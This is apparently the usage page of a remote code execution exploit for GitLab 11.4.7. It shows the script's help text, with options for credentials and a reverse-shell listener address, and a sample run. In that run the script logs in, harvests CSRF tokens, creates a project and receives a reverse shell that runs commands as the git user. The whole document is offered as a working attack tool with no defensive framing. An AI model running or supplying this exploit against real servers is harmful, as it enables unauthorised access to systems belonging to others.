GitLab 11.4.7 Remote Code Execution

$ python3 exploit.py --help
usage: exploit.py [-h] -t TARGET -u USERNAME -p PASSWORD -li LISTENER_IP [-lp LISTENER_PORT]

GitLab 11.4.7 Remote Code Execution Exploit

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        GitLab URL - http://10.10.10.10:8000/
  -u USERNAME, --username USERNAME
                        GitLab username
  -p PASSWORD, --password PASSWORD
                        GitLab password
  -li LISTENER_IP, --listener-ip LISTENER_IP
                        IP for reverse shell
  -lp LISTENER_PORT, --listener-port LISTENER_PORT
                        Port for reverse shell

$ python3 exploit.py -t http://10.10.10.10:8080/ -u username -p password -li 10.10.10.1
[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.10.10.10 on port 56708
[+] Found CSRF token: Y7/CPi+gF3Xdk5IfskectTsqZmfwO1cnnRVl1dN5sdflJBvH5niBtdm2pSsAg0B/mQwYdGa71RXlwGbB3Kit+g==
[+] Logged in
[+] Found CSRF token: pX/a0Sq5xdV/q/jr0t2w+rpZ9NXn3xt0AwyznR6mGcSNwyLMHSEeo4IcooG0J//3wK6U172pIr9ApTnnlBJKYw==
[+] Found namespace ID: 6
[+] New project created
[*] Switching to interactive mode
$ id
uid=998(git) gid=998(git) groups=998(git)